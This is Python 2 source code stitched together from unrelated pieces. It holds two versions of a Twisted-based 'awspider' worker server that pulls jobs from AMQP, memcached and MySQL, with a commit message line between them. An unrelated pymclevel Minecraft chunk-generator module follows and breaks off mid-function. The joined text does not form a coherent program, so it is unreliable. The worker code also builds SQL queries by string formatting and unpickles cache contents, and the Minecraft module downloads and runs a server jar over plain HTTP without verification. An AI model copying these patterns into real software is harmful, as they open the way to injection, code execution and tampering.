exposed_function = job["exposed_function"]
kwargs = job["kwargs"]
function_name = job["function_name"]
uuid = job["uuid"]
d = self.callExposedFunction(
exposed_function["function"],
kwargs,
function_name,
uuid=uuid)
d.addCallback(self._executeJob2)
d.addErrback(self.workerError)
def _executeJob2(self, data):
self.jobs_complete += 1
LOGGER.info('Completed %d jobs' % self.jobs_complete)
def workerError(self, error):
LOGGER.error('Worker Error: %s' % str(error))
def getJob(self, uuid):
d = self.memc.get(uuid)
d.addCallback(self._getJob, uuid)
d.addErrback(self.workerError)
return d
def _getJob(self, account, uuid):
job = account[1]
if not job:
LOGGER.debug('Could not find uuid in memcached: %s' % uuid)
sql = "SELECT account_id, type FROM spider_service WHERE uuid = '%s'" % uuid
d = self.mysql.runQuery(sql)
d.addCallback(self._getAccountMySQL, uuid)
d.addErrback(self.workerError)
return d
else:
LOGGER.debug('Found uuid in memcached: %s' % uuid)
return pickle.loads(job)
def _getAccountMySQL(self, spider_info, uuid):
if spider_info:
account_type = spider_info[0]['type'].split('/')[0]
sql = "SELECT * FROM content_%saccount WHERE account_id = %d" % (account_type, spider_info[0]['account_id'])
d = self.mysql.runQuery(sql)
d.addCallback(self.createJob, spider_info, uuid)
d.addErrback(self.workerError)
return d
LOGGER.critical('No spider_info given for uuid %s' % uuid)
return None
def createJob(self, account_info, spider_info, uuid):
job = {}
account = account_info[0]
function_name = spider_info[0]['type']
if self.resource_mapping and self.resource_mapping.has_key(function_name):
LOGGER.info('Remapping resource %s to %s' % (function_name, self.resource_mapping[function_name]))
function_name = self.resource_mapping[function_name]
job['function_name'] = function_name
job['reservation_cache'] = None
job['uuid'] = uuid
job['account'] = account
# Save account info in memcached for up to 7 days
d = self.memc.set(uuid, pickle.dumps(job), 60*60*24*7)
d.addCallback(self._createJob, job)
d.addErrback(self.workerError)
return d
def _createJob(self, memc, job):
return job
def mapKwargs(self, job):
kwargs = {}
service_name = job['function_name'].split('/')[0]
# remap some basic fields that differ from the plugin and the database
if ('%s_user_id' % service_name) in job['account']:
job['account']['user_id'] = job['account']['%s_user_id' % service_name]
job['account']['username'] = job['account']['%s_user_id' % service_name]
if 'session_key' in job['account']:
job['account']['sk'] = job['account']['session_key']
if 'secret' in job['account']:
job['account']['token_secret'] = job['account']['secret']
if 'key' in job['account']:
job['account']['token_key'] = job['account']['key']
for arg in job['exposed_function']['required_arguments']:
if arg in job['account']:
kwargs[arg] = job['account'][arg]
for arg in job['exposed_function']['optional_arguments']:
if arg in job['account']:
kwargs[arg] = job['account'][arg]
return kwargs
def createReservation(self, function_name, **kwargs):
uuid = uuid4().hex
if not isinstance(function_name, str):
for key in self.functions:
if self.functions[key]["function"] == function_name:
function_name = key
break
if function_name not in self.functions:
raise Exception("Function %s does not exist." % function_name)
d = self.callExposedFunction(
self.functions[function_name]["function"],
kwargs,
function_name,
uuid=uuid)
d.addCallback(self._createReservationCallback, function_name, uuid)
d.addErrback(self._createReservationErrback, function_name, uuid)
return d
def _createReservationCallback(self, data, function_name, uuid):
return data
def _createReservationErrback(self, error, function_name, uuid):
LOGGER.error("Unable to create reservation for %s:%s, %s.\n" % (function_name, uuid, error))
return {}
def getNetworkAddress(self):
d = getNetworkAddress()
d.addCallback(self._getNetworkAddressCallback)
d.addErrback(self._getNetworkAddressErrback)
return d
def _getNetworkAddressCallback(self, data):
if "public_ip" in data:
self.public_ip = data["public_ip"]
self.network_information["public_ip"] = self.public_ip
if "local_ip" in data:
self.local_ip = data["local_ip"]
self.network_information["local_ip"] = self.local_ip
def _getNetworkAddressErrback(self, error):
message = "Could not get network address."
LOGGER.error(message)
raise Exception(message)
more speed improvments and amqp ack changes to ack if we successfully processed the job
from .base import BaseServer, LOGGER
from ..resources2 import WorkerResource
from ..networkaddress import getNetworkAddress
from ..amqp import amqp as AMQP
from ..resources import InterfaceResource, ExposedResource
from MySQLdb.cursors import DictCursor
from twisted.internet import reactor, protocol, task
from twisted.enterprise import adbapi
from twisted.web import server
from twisted.protocols.memcache import MemCacheProtocol, DEFAULT_PORT
from twisted.internet.defer import Deferred, DeferredList, maybeDeferred, inlineCallbacks
from twisted.internet.threads import deferToThread
from uuid import UUID, uuid4
import pprint
import cPickle as pickle
PRETTYPRINTER = pprint.PrettyPrinter(indent=4)
class WorkerServer(BaseServer):
public_ip = None
local_ip = None
network_information = {}
simultaneous_jobs = 100
doSomethingCallLater = None
jobs_complete = 0
job_queue = []
job_queue_a = job_queue.append
def __init__(self,
aws_access_key_id,
aws_secret_access_key,
aws_s3_http_cache_bucket=None,
aws_s3_storage_bucket=None,
mysql_username=None,
mysql_password=None,
mysql_host=None,
mysql_database=None,
amqp_host=None,
amqp_username=None,
amqp_password=None,
amqp_vhost=None,
amqp_queue=None,
amqp_exchange=None,
memcached_host=None,
resource_mapping=None,
amqp_port=5672,
amqp_prefetch_count=1000,
mysql_port=3306,
memcached_port=11211,
max_simultaneous_requests=100,
max_requests_per_host_per_second=0,
max_simultaneous_requests_per_host=0,
port=5005,
log_file='workerserver.log',
log_directory=None,
log_level="debug"):
self.network_information["port"] = port
# Create MySQL connection.
self.mysql = adbapi.ConnectionPool(
"MySQLdb",
db=mysql_database,
port=mysql_port,
user=mysql_username,
passwd=mysql_password,
host=mysql_host,
cp_reconnect=True,
cursorclass=DictCursor)
# Create Memcached client
self.memcached_host = memcached_host
self.memcached_port = memcached_port
self.memc_ClientCreator = protocol.ClientCreator(
reactor, MemCacheProtocol)
# Resource Mappings
self.resource_mapping = resource_mapping
# HTTP interface
resource = WorkerResource(self)
self.site_port = reactor.listenTCP(port, server.Site(resource))
# Create AMQP Connection
# AMQP connection parameters
self.amqp_host = amqp_host
self.amqp_vhost = amqp_vhost
self.amqp_port = amqp_port
self.amqp_username = amqp_username
self.amqp_password = amqp_password
self.amqp_queue = amqp_queue
self.amqp_exchange = amqp_exchange
self.amqp_prefetch_count = amqp_prefetch_count
BaseServer.__init__(
self,
aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
aws_s3_http_cache_bucket=aws_s3_http_cache_bucket,
aws_s3_storage_bucket=aws_s3_storage_bucket,
max_simultaneous_requests=max_simultaneous_requests,
max_requests_per_host_per_second=max_requests_per_host_per_second,
max_simultaneous_requests_per_host=max_simultaneous_requests_per_host,
log_file=log_file,
log_directory=log_directory,
log_level=log_level)
def start(self):
reactor.callWhenRunning(self._start)
return self.start_deferred
@inlineCallbacks
def _start(self):
yield self.getNetworkAddress()
# Create memcached client
self.memc = yield self.memc_ClientCreator.connectTCP(self.memcached_host, self.memcached_port)
LOGGER.info('Connecting to broker.')
self.conn = yield AMQP.createClient(
self.amqp_host,
self.amqp_vhost,
self.amqp_port)
self.auth = yield self.conn.authenticate(
self.amqp_username,
self.amqp_password)
self.chan = yield self.conn.channel(1)
yield self.chan.channel_open()
yield self.chan.basic_qos(prefetch_count=self.amqp_prefetch_count)
# Create Queue
yield self.chan.queue_declare(
queue=self.amqp_queue,
durable=False,
exclusive=False,
auto_delete=False)
yield self.chan.queue_bind(
queue=self.amqp_queue,
exchange=self.amqp_exchange)
d = self.chan.basic_consume(queue=self.amqp_queue,
no_ack=False,
consumer_tag="awspider_consumer")
d.addCallback(self.dequeue)
self.queue = yield self.conn.queue("awspider_consumer")
yield BaseServer.start(self)
self.jobsloop = task.LoopingCall(self.executeJobs)
self.jobsloop.start(1)
@inlineCallbacks
def shutdown(self):
LOGGER.debug("Closting connection")
try:
self.doSomethingCallLater.cancel()
except:
pass
# Shut things down
LOGGER.info('Closing broker connection')
yield self.chan.channel_close()
chan0 = yield self.conn.channel(0)
yield chan0.connection_close()
def dequeue(self, consumer=None):
LOGGER.info('Starting Dequeuing Thread...')
deferToThread(self._dequeue)
def _dequeue(self):
if len(self.active_jobs) <= self.amqp_prefetch_count:
d = self.queue.get()
d.addCallback(self._dequeue2)
d.addErrback(self.workerError)
else:
reactor.callLater(1, self._dequeue)
def _dequeue2(self, msg):
# Get the hex version of the UUID from byte string we were sent
uuid = UUID(bytes=msg.content.body).hex
d = self.getJob(uuid, msg.delivery_tag)
d.addCallback(self._dequeue3, msg)
d.addErrback(self.workerError)
def _dequeue3(self, job, msg):
if job:
# Load custom function.
if job['function_name'] in self.functions:
job['exposed_function'] = self.functions[job['function_name']]
else:
LOGGER.error("Could not find function %s." % job['function_name'])
LOGGER.info('Pulled job off of AMQP queue')
job['kwargs'] = self.mapKwargs(job)
job['delivery_tag'] = msg.delivery_tag
self.job_queue_a(job)
self._dequeue()
def executeJobs(self):
while len(self.job_queue) > 0 and len(self.active_jobs) < self.simultaneous_jobs:
job = self.job_queue.pop(0)
exposed_function = job["exposed_function"]
kwargs = job["kwargs"]
function_name = job["function_name"]
uuid = job["uuid"]
d = self.callExposedFunction(
exposed_function["function"],
kwargs,
function_name,
uuid=uuid)
d.addCallback(self._executeJob2, job)
d.addErrback(self.workerError)
def _executeJob2(self, data, job):
self.chan.basic_ack(delivery_tag=job['delivery_tag'])
self.jobs_complete += 1
LOGGER.info('Completed %d jobs' % self.jobs_complete)
def workerError(self, error):
LOGGER.error('Worker Error: %s' % str(error))
def getJob(self, uuid, delivery_tag):
d = self.memc.get(uuid)
d.addCallback(self._getJob, uuid, delivery_tag)
d.addErrback(self.workerError)
return d
def _getJob(self, account, uuid, delivery_tag):
job = account[1]
if not job:
LOGGER.debug('Could not find uuid in memcached: %s' % uuid)
sql = "SELECT account_id, type FROM spider_service WHERE uuid = '%s'" % uuid
d = self.mysql.runQuery(sql)
d.addCallback(self._getAccountMySQL, uuid, delivery_tag)
d.addErrback(self.workerError)
return d
else:
LOGGER.debug('Found uuid in memcached: %s' % uuid)
return pickle.loads(job)
def _getAccountMySQL(self, spider_info, uuid, delivery_tag):
if spider_info:
account_type = spider_info[0]['type'].split('/')[0]
sql = "SELECT * FROM content_%saccount WHERE account_id = %d" % (account_type, spider_info[0]['account_id'])
d = self.mysql.runQuery(sql)
d.addCallback(self.createJob, spider_info, uuid)
d.addErrback(self.workerError)
return d
LOGGER.critical('No spider_info given for uuid %s' % uuid)
self.chan.basic_ack(delivery_tag=delivery_tag)
return None
def createJob(self, account_info, spider_info, uuid):
job = {}
account = account_info[0]
function_name = spider_info[0]['type']
if self.resource_mapping and self.resource_mapping.has_key(function_name):
LOGGER.info('Remapping resource %s to %s' % (function_name, self.resource_mapping[function_name]))
function_name = self.resource_mapping[function_name]
job['function_name'] = function_name
job['reservation_cache'] = None
job['uuid'] = uuid
job['account'] = account
# Save account info in memcached for up to 7 days
d = self.memc.set(uuid, pickle.dumps(job), 60*60*24*7)
d.addCallback(self._createJob, job)
d.addErrback(self.workerError)
return d
def _createJob(self, memc, job):
return job
def mapKwargs(self, job):
kwargs = {}
service_name = job['function_name'].split('/')[0]
# remap some basic fields that differ from the plugin and the database
if ('%s_user_id' % service_name) in job['account']:
job['account']['user_id'] = job['account']['%s_user_id' % service_name]
job['account']['username'] = job['account']['%s_user_id' % service_name]
if 'session_key' in job['account']:
job['account']['sk'] = job['account']['session_key']
if 'secret' in job['account']:
job['account']['token_secret'] = job['account']['secret']
if 'key' in job['account']:
job['account']['token_key'] = job['account']['key']
for arg in job['exposed_function']['required_arguments']:
if arg in job['account']:
kwargs[arg] = job['account'][arg]
for arg in job['exposed_function']['optional_arguments']:
if arg in job['account']:
kwargs[arg] = job['account'][arg]
return kwargs
def createReservation(self, function_name, **kwargs):
uuid = uuid4().hex
if not isinstance(function_name, str):
for key in self.functions:
if self.functions[key]["function"] == function_name:
function_name = key
break
if function_name not in self.functions:
raise Exception("Function %s does not exist." % function_name)
d = self.callExposedFunction(
self.functions[function_name]["function"],
kwargs,
function_name,
uuid=uuid)
d.addCallback(self._createReservationCallback, function_name, uuid)
d.addErrback(self._createReservationErrback, function_name, uuid)
return d
def _createReservationCallback(self, data, function_name, uuid):
return data
def _createReservationErrback(self, error, function_name, uuid):
LOGGER.error("Unable to create reservation for %s:%s, %s.\n" % (function_name, uuid, error))
return {}
def getNetworkAddress(self):
d = getNetworkAddress()
d.addCallback(self._getNetworkAddressCallback)
d.addErrback(self._getNetworkAddressErrback)
return d
def _getNetworkAddressCallback(self, data):
if "public_ip" in data:
self.public_ip = data["public_ip"]
self.network_information["public_ip"] = self.public_ip
if "local_ip" in data:
self.local_ip = data["local_ip"]
self.network_information["local_ip"] = self.local_ip
def _getNetworkAddressErrback(self, error):
message = "Could not get network address."
LOGGER.error(message)
raise Exception(message) |
'''
Created on Jul 22, 2011
@author: Rio
'''
from mclevelbase import *
from collections import deque;
import time
import zlib
import struct
import shutil
import subprocess
import sys
import urllib
import tempfile
from os.path import join, dirname, basename
log = logging.getLogger(__name__)
warn, error, info, debug = log.warn, log.error, log.info, log.debug
#infinite
Level = 'Level'
BlockData = 'BlockData'
BlockLight = 'BlockLight'
SkyLight = 'SkyLight'
HeightMap = 'HeightMap'
TerrainPopulated = 'TerrainPopulated'
LastUpdate = 'LastUpdate'
xPos = 'xPos'
zPos = 'zPos'
Data = 'Data'
SpawnX = 'SpawnX'
SpawnY = 'SpawnY'
SpawnZ = 'SpawnZ'
LastPlayed = 'LastPlayed'
RandomSeed = 'RandomSeed'
SizeOnDisk = 'SizeOnDisk' #maybe update this?
Time = 'Time'
Player = 'Player'
__all__ = ["ZeroChunk", "InfdevChunk", "ChunkedLevelMixin", "MCInfdevOldLevel", "MCAlphaDimension", "ZipSchematic"]
import re
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
def sort_nicely(l):
""" Sort the given list in the way that humans expect.
"""
l.sort(key=alphanum_key)
# Thank you, Stackoverflow
# http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, _fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
if sys.platform == "win32":
if "SYSTEMROOT" in os.environ:
root = os.environ["SYSTEMROOT"]
exe_file = os.path.join(root, program)
if is_exe(exe_file):
return exe_file
if "PATH" in os.environ:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
if sys.platform == "win32":
appSupportDir = os.path.join(appDataDir, u"pymclevel")
elif sys.platform == "darwin":
appSupportDir = os.path.expanduser(u"~/Library/Application Support/pymclevel/")
else:
appSupportDir = os.path.expanduser(u"~/.pymclevel")
class ServerJarStorage(object):
defaultCacheDir = os.path.join(appSupportDir, u"ServerJarStorage")
def __init__(self, cacheDir=None):
if cacheDir is None:
cacheDir = self.defaultCacheDir
self.cacheDir = cacheDir
if not os.path.exists(self.cacheDir):
os.makedirs(self.cacheDir)
readme = os.path.join(self.cacheDir, "README.TXT")
if not os.path.exists(readme):
with file(readme, "w") as f:
f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to store different versions of the
Minecraft Server to use for terrain generation. It should have one or more
subfolders, one for each version of the server. Each subfolder must hold at
least one file named minecraft_server.jar, and the subfolder's name should
have the server's version plus the names of any installed mods.
There may already be a subfolder here (for example, "Beta 1.7.3") if you have
used the Chunk Create feature in MCEdit to create chunks using the server.
Version numbers can be automatically detected. If you place one or more
minecraft_server.jar files in this folder, they will be placed automatically
into well-named subfolders the next time you run MCEdit. If a file's name
begins with "minecraft_server" and ends with ".jar", it will be detected in
this way.
""")
self.reloadVersions()
def reloadVersions(self):
cacheDirList = os.listdir(self.cacheDir)
self.versions = list(reversed(sorted([v for v in cacheDirList if os.path.exists(self.jarfileForVersion(v))], key=alphanum_key)))
if MCServerChunkGenerator.javaExe:
for f in cacheDirList:
p = os.path.join(self.cacheDir, f)
if f.startswith("minecraft_server") and f.endswith(".jar") and os.path.isfile(p):
print "Unclassified minecraft_server.jar found in cache dir. Discovering version number..."
self.cacheNewVersion(p)
os.remove(p)
print "Minecraft_Server.jar storage initialized."
print u"Each server is stored in a subdirectory of {0} named with the server's version number".format(self.cacheDir)
print "Cached servers: ", self.versions
def downloadCurrentServer(self):
print "Downloading the latest Minecraft Server..."
try:
(filename, headers) = urllib.urlretrieve("http://www.minecraft.net/download/minecraft_server.jar")
except Exception, e:
print "Error downloading server: {0!r}".format(e)
return
self.cacheNewVersion(filename, allowDuplicate=False)
def cacheNewVersion(self, filename, allowDuplicate=True):
""" Finds the version number from the server jar at filename and copies
it into the proper subfolder of the server jar cache folder"""
version = MCServerChunkGenerator._serverVersionFromJarFile(filename)
print "Found version ", version
versionDir = os.path.join(self.cacheDir, version)
i = 1
newVersionDir = versionDir
while os.path.exists(newVersionDir):
if not allowDuplicate: return
newVersionDir = versionDir + " (" + str(i) + ")"
i += 1
os.mkdir(newVersionDir)
shutil.copy2(filename, os.path.join(newVersionDir, "minecraft_server.jar"))
if version not in self.versions:
self.versions.append(version)
def jarfileForVersion(self, v):
return os.path.join(self.cacheDir, v, "minecraft_server.jar").encode(sys.getfilesystemencoding())
def checksumForVersion(self, v):
jf = self.jarfileForVersion(v)
with file(jf, "rb") as f:
import hashlib
return (hashlib.md5(f.read()).hexdigest())
broken_versions = ["Beta 1.9 Prerelease {0}".format(i) for i in (1,2,3)]
@property
def latestVersion(self):
if len(self.versions) == 0: return None
return max( (v for v in self.versions if v not in self.broken_versions), key=alphanum_key)
def getJarfile(self, version=None):
if len(self.versions) == 0:
print "No servers found in cache."
self.downloadCurrentServer()
version = version or self.latestVersion
if version not in self.versions: return None
return self.jarfileForVersion(version)
class JavaNotFound(RuntimeError): pass
class VersionNotFound(RuntimeError): pass
def readProperties(filename):
if not os.path.exists(filename): return {}
with file(filename) as f:
properties = dict((line.split("=", 2) for line in (l.strip() for l in f) if not line.startswith("#")))
return properties
def saveProperties(filename, properties):
with file(filename, "w") as f:
for k, v in properties.iteritems():
f.write("{0}={1}\n".format(k, v))
def findJava():
if sys.platform == "win32":
javaExe = which("java.exe")
if javaExe is None:
KEY_NAME = "HKLM\SOFTWARE\JavaSoft\Java Runtime Environment"
try:
p = subprocess.Popen(["REG", "QUERY", KEY_NAME, "/v", "CurrentVersion"], stdout=subprocess.PIPE, universal_newlines=True)
o, e = p.communicate()
lines = o.split("\n")
for l in lines:
l = l.strip()
if l.startswith("CurrentVersion"):
words = l.split(None, 2)
version = words[-1]
p = subprocess.Popen(["REG", "QUERY", KEY_NAME + "\\" + version, "/v", "JavaHome"], stdout=subprocess.PIPE, universal_newlines=True)
o, e = p.communicate()
lines = o.split("\n")
for l in lines:
l = l.strip()
if l.startswith("JavaHome"):
w = l.split(None, 2)
javaHome = w[-1]
javaExe = os.path.join(javaHome, "bin", "java.exe")
print "RegQuery: java.exe found at ", javaExe
break
except Exception, e:
print "Error while locating java.exe using the Registry: ", repr(e)
else:
javaExe = which("java")
return javaExe
class MCServerChunkGenerator(object):
"""Generates chunks using minecraft_server.jar. Uses a ServerJarStorage to
store different versions of minecraft_server.jar in an application support
folder.
from pymclevel import *
Example usage:
gen = MCServerChunkGenerator() # with no arguments, use the newest
# server version in the cache, or download
# the newest one automatically
level = loadWorldNamed("MyWorld")
gen.generateChunkInLevel(level, 12, 24)
Using an older version:
gen = MCServerChunkGenerator("Beta 1.6.5")
"""
defaultJarStorage = None
javaExe = findJava()
jarStorage = None
tempWorldCache = {}
def __init__(self, version=None, jarfile=None, jarStorage=None):
self.jarStorage = jarStorage or self.getDefaultJarStorage()
if self.javaExe is None:
raise JavaNotFound, "Could not find java. Please check that java is installed correctly. (Could not find java in your PATH environment variable.)"
if jarfile is None:
jarfile = self.jarStorage.getJarfile(version)
if jarfile is None:
raise VersionNotFound, "Could not find minecraft_server.jar for version {0}. Please make sure that a minecraft_server.jar is placed under {1} in a subfolder named after the server's version number.".format(version or "(latest)", self.jarStorage.cacheDir)
self.serverJarFile = jarfile
self.serverVersion = version or self._serverVersion()
@classmethod
def getDefaultJarStorage(cls):
if cls.defaultJarStorage is None:
cls.defaultJarStorage = ServerJarStorage()
return cls.defaultJarStorage
@classmethod
def clearWorldCache(cls):
cls.tempWorldCache = {}
for tempDir in os.listdir(cls.worldCacheDir):
t = os.path.join(cls.worldCacheDir, tempDir)
if os.path.isdir(t):
shutil.rmtree(t)
def createReadme(self):
readme = os.path.join(self.worldCacheDir, "README.TXT")
if not os.path.exists(readme):
with file(readme, "w") as f:
f.write("""
About this folder:
This folder is used by MCEdit and pymclevel to cache levels during terrain
generation. Feel free to delete it for any reason.
""")
worldCacheDir = os.path.join(tempfile.gettempdir(), "pymclevel_MCServerChunkGenerator")
def tempWorldForLevel(self, level):
#tempDir = tempfile.mkdtemp("mclevel_servergen")
tempDir = os.path.join(self.worldCacheDir, self.jarStorage.checksumForVersion(self.serverVersion), str(level.RandomSeed))
propsFile = os.path.join(tempDir, "server.properties")
properties = readProperties(propsFile)
tempWorld = self.tempWorldCache.get((self.serverVersion, level.RandomSeed))
if tempWorld is None:
if not os.path.exists(tempDir):
os.makedirs(tempDir)
self.createReadme()
worldName = "world"
worldName = properties.setdefault("level-name", worldName)
tempWorldDir = os.path.join(tempDir, worldName)
tempWorld = MCInfdevOldLevel(tempWorldDir, create=True, random_seed=level.RandomSeed)
del tempWorld.version # for compatibility with older servers. newer ones will set it again without issue.
self.tempWorldCache[self.serverVersion, level.RandomSeed] = tempWorld
if level.dimNo == 0:
properties["allow-nether"] = "false"
else:
tempWorld = tempWorld.getDimension(level.dimNo)
properties["allow-nether"] = "true"
properties["server-port"] = int(32767 + random.random() * 32700)
saveProperties(propsFile, properties)
return (tempWorld, tempDir)
def generateAtPosition(self, tempWorld, tempDir, cx, cz):
return exhaust(self.generateAtPositionIter(tempWorld, tempDir, cx, cz))
def generateAtPositionIter(self, tempWorld, tempDir, cx, cz, simulate = False):
tempWorld.setPlayerSpawnPosition((cx * 16, 64, cz * 16))
tempWorld.saveInPlace()
tempWorld.unloadRegions()
startTime = time.time()
proc = self.runServer(tempDir)
while proc.poll() is None:
line = proc.stderr.readline().strip()
info(line)
yield line
if "[INFO] Done" in line:
if simulate:
duration = time.time() - startTime
simSeconds = int(duration) + 1
for i in range(simSeconds):
# process tile ticks
yield "%2d/%2d: Simulating the world for a little bit..." % (i, simSeconds)
time.sleep(1)
proc.stdin.write("stop\n")
proc.wait()
break
if "FAILED TO BIND" in line:
proc.kill()
proc.wait()
raise RuntimeError, "Server failed to bind to port!"
stdout, _ = proc.communicate()
if "Could not reserve enough space" in stdout and not MCServerChunkGenerator.lowMemory:
MCServerChunkGenerator.lowMemory = True
for i in self.generateAtPositionIter(tempWorld, tempDir, cx, cz):
yield i
(tempWorld.parentWorld or tempWorld).loadLevelDat() #reload version number
def copyChunkAtPosition(self, tempWorld, level, cx, cz):
if level.containsChunk(cx, cz): return
try:
tempChunk = tempWorld.getChunk(cx, cz)
except ChunkNotPresent, e:
raise ChunkNotPresent, "While generating a world in {0} using server {1} ({2!r})".format(tempWorld, self.serverJarFile, e), sys.exc_traceback
tempChunk.decompress()
tempChunk.unpackChunkData()
root_tag = tempChunk.root_tag
if not level.containsChunk(cx, cz):
level.createChunk(cx, cz)
chunk = level.getChunk(cx, cz)
chunk.decompress()
chunk.unpackChunkData()
chunk.root_tag = root_tag #xxx tag swap, could copy blocks and entities and chunk attrs instead?
chunk.dirty = True
chunk.compress()
chunk.save()
chunk.unload()
tempChunk.compress()
tempChunk.unload()
def generateChunkInLevel(self, level, cx, cz):
assert isinstance(level, MCInfdevOldLevel)
tempWorld, tempDir = self.tempWorldForLevel(level)
self.generateAtPosition(tempWorld, tempDir, cx, cz)
self.copyChunkAtPosition(tempWorld, level, cx, cz)
minRadius = 5
maxRadius = 20
def createLevel(self, level, box, simulate = False, **kw):
return exhaust(self.createLevelIter(level, box, simulate, **kw))
def createLevelIter(self, level, box, simulate = False, **kw):
if isinstance(level, basestring):
filename = level
level = MCInfdevOldLevel(filename, create=True, **kw)
assert isinstance(level, MCInfdevOldLevel)
minRadius = self.minRadius
genPositions = list(itertools.product(
xrange(box.mincx, box.maxcx, minRadius * 2),
xrange(box.mincz, box.maxcz, minRadius * 2)))
for i, (cx,cz) in enumerate(genPositions):
info("Generating at %s" % ((cx,cz),))
parentDir = dirname(level.worldDir)
propsFile = join(parentDir, "server.properties")
props = readProperties(join(dirname(self.serverJarFile), "server.properties"))
props["level-name"] = basename(level.worldDir)
props["server-port"] = int(32767 + random.random() * 32700)
saveProperties(propsFile, props)
for p in self.generateAtPositionIter(level, parentDir, cx, cz, simulate):
yield i, len(genPositions), p
level.unloadRegions()
def generateChunksInLevel(self, level, chunks):
return exhaust(self.generateChunksInLevelIter(level, chunks))
def generateChunksInLevelIter(self, level, chunks, simulate = False):
assert isinstance(level, MCInfdevOldLevel)
tempWorld, tempDir = self.tempWorldForLevel(level)
startLength = len(chunks)
minRadius = self.minRadius
maxRadius = self.maxRadius
chunks = set(chunks)
while len(chunks):
length = len(chunks)
centercx, centercz = chunks.pop()
chunks.add((centercx, centercz))
#assume the generator always generates at least an 11x11 chunk square.
centercx += minRadius
centercz += minRadius
#boxedChunks = [cPos for cPos in chunks if inBox(cPos)]
print "Generating {0} chunks out of {1} starting from {2}".format("XXX", len(chunks), (centercx, centercz))
yield startLength - len(chunks), startLength
#chunks = [c for c in chunks if not inBox(c)]
for p in self.generateAtPositionIter(tempWorld, tempDir, centercx, centercz, simulate):
yield startLength - len(chunks), startLength, p
i=0
for cx, cz in itertools.product(
xrange(centercx-maxRadius, centercx+maxRadius),
xrange(centercz-maxRadius, centercz+maxRadius)):
if level.containsChunk(cx,cz):
chunks.discard((cx,cz))
elif ((cx,cz) in chunks
and tempWorld.containsChunk(cx, cz)
and tempWorld.getChunk(cx,cz).TerrainPopulated
):
self.copyChunkAtPosition(tempWorld, level, cx, cz)
i+= 1
chunks.discard((cx,cz))
yield startLength - len(chunks), startLength
if length == len(chunks):
print "No chunks were generated. Aborting."
break
level.saveInPlace()
def runServer(self, startingDir):
return self._runServer(startingDir, self.serverJarFile)
lowMemory = False
@classmethod
def _runServer(cls, startingDir, jarfile):
info("Starting server %s in %s", jarfile, startingDir)
if cls.lowMemory: memflags = []
else: memflags = ["-Xmx1024M", "-Xms1024M", ]
proc = subprocess.Popen([cls.javaExe, "-Djava.awt.headless=true"] + memflags + ["-jar", jarfile],
executable=cls.javaExe,
cwd=startingDir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
return proc
def _serverVersion(self):
return self._serverVersionFromJarFile(self.serverJarFile)
@classmethod
def _serverVersionFromJarFile(cls, jarfile):
tempdir = tempfile.mkdtemp("mclevel_servergen")
proc = cls._runServer(tempdir, jarfile)
version = "Unknown"
#out, err = proc.communicate()
#for line in err.split("\n"):
while proc.poll() is None:
line = proc.stderr.readline()
if "Preparing start region" in line: break
if "Starting minecraft server version" in line:
version = line.split("Starting minecraft server version")[1].strip()
break
if proc.returncode is None:
try:
proc.kill()
except WindowsError:
pass #access denied, process already terminated
proc.wait()
shutil.rmtree(tempdir)
if ";)" in version: version = version.replace(";)", "") #Damnit, Jeb!
# Versions like "0.2.1" are alphas, and versions like "1.0.0" without "Beta" are releases
if version[0] == "0":
version = "Alpha " + version
try:
if int(version[0]) > 0:
version = "Release " + version
except ValueError:
pass
return version
_zeros = {}
def ZeroChunk(height=512):
z = _zeros.get(height)
if z is None:
z = _zeros[height] = _ZeroChunk(height)
return z
class _ZeroChunk(object):
" a placebo for neighboring-chunk routines "
def compress(self): pass
def load(self): pass
def __init__(self, height=512):
zeroChunk = zeros((16, 16, height), uint8)
whiteLight = zeroChunk + 15;
self.Blocks = zeroChunk
self.BlockLight = whiteLight
self.SkyLight = whiteLight
self.Data = zeroChunk
class InfdevChunk(EntityLevel):
""" This is a 16x16xH chunk in an (infinite) world.
The properties Blocks, Data, SkyLight, BlockLight, and Heightmap
are ndarrays containing the respective blocks in the chunk file.
Each array is indexed [x,z,y]. The Data, Skylight, and BlockLight
arrays are automatically unpacked from nibble arrays into byte arrays
for better handling.
"""
@property
def filename(self):
if self.world.version:
cx, cz = self.chunkPosition
rx, rz = cx >> 5, cz >> 5
rf = self.world.regionFiles[rx, rz]
offset = rf.getOffset(cx & 0x1f, cz & 0x1f)
return u"{region} index {index} sector {sector} length {length} format {format}".format(
region=os.path.basename(self.world.regionFilename(rx, rz)),
sector=offset >> 8,
length = offset & 0xff,
index=4 * ((cx & 0x1f) + ((cz & 0x1f) * 32)),
format=["???", "gzip", "deflate"][self.compressMode])
else:
return self.chunkFilename
dirty = False;
needsLighting = False
compressedTag = None
root_tag = None
def __init__(self, world, chunkPosition, create=False):
self.world = world;
self.chunkPosition = chunkPosition;
self.chunkFilename = world.chunkFilename(*chunkPosition)
if self.world.version:
self.compressMode = MCRegionFile.VERSION_DEFLATE
else:
self.compressMode = MCRegionFile.VERSION_GZIP
if create:
self.create();
else:
if not world.containsChunk(*chunkPosition):
raise ChunkNotPresent("Chunk {0} not found", self.chunkPosition)
@property
def materials(self):
return self.world.materials
@classmethod
def compressTagGzip(cls, root_tag):
buf = StringIO()
with closing(gzip.GzipFile(fileobj=buf, mode='wb', compresslevel=2)) as gzipper:
root_tag.save(buf=gzipper)
return buf.getvalue()
@classmethod
def compressTagDeflate(cls, root_tag):
buf = StringIO()
root_tag.save(buf=buf)
return deflate(buf.getvalue())
def _compressChunk(self):
root_tag = self.root_tag
if root_tag is None: return
if self.compressMode == MCRegionFile.VERSION_GZIP:
self.compressedTag = self.compressTagGzip(root_tag)
if self.compressMode == MCRegionFile.VERSION_DEFLATE:
self.compressedTag = self.compressTagDeflate(root_tag)
self.root_tag = None
def decompressTagGzip(self, data):
return nbt.load(buf=gunzip(data))
def decompressTagDeflate(self, data):
return nbt.load(buf=inflate(data))
def _decompressChunk(self):
data = self.compressedTag
